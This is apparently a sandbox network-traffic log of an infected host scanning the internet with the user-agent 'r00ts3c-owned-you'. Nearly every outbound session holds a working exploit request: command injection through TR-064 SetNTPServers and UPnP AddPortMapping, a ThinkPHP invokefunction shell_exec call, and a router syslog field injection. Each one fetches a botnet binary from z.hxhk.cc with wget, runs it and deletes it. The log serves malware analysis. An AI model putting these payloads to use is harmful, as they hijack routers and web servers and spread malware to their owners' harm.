remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:02.241013050 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.23	49420	72.27.193.199	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.052279949 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:02.193679094 CET	88	IN	HTTP/1.1 500 Internal Server Error Connection: Close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.23	34424	34.116.7.92	5555

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.469295979 CET	853	OUT	POST /UD/?9 HTTP/1.1 User-Agent: r00ts3c-owned-you Content-Type: text/xml SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 34 39 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 3e 2f 74 6d 70 2f 2e 65 20 26 26 20 63 64 20 2f 74 6d 70 3b 20 3e 2f 76 61 72 2f 64 65 76 2f 2e 65 20 26 26 20 63 64 20 2f 76 61 72 2f 64 65 76 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 61 64 62 3b 20 63 68 6d 6f 64 20 37 37 37 20 61 64 62 3b 20 73 68 20 61 64 62 3b 20 72 6d 20 61 64 62 3b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://z.hxhk.cc/adb; chmod 777 adb; sh adb; rm adb;`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.23	44832	179.155.26.219	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.650161982 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:09.097331047 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:16.779572964 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:32.142997026 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:58:03.618122101 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.23	53246	176.56.242.49	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.790699005 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.23	57892	112.185.130.136	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.873631001 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.144743919 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:57:02 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.23	49710	95.86.89.123	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.076476097 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.23	34850	170.249.13.75	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.137100935 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:03.279728889 CET	174	IN	HTTP/1.1 400 Bad Request Content-Length: 0 Date: Mon, 18 Mar 2024 08:57:43 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self'

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.23	50374	95.174.15.107	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.253990889 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.431683064 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:57:02 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.23	53578	95.217.146.108	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.265450954 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.454229116 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:03 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.23	57814	95.217.128.97	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.265465975 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.454658985 CET	359	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Server: nginx centminmod X-Powered-By: centminmod Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.23	37980	95.90.73.25	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.278470039 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.479239941 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:03 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.23	46888	95.105.71.197	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.302726984 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.528529882 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Mon, 18 Mar 2024 08:57:03 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.23	45710	186.223.127.222	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.365817070 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.23	45726	186.223.127.222	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.609019995 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.23	57098	72.228.173.126	80

Timestamp	Bytes transferred	Direction	Data
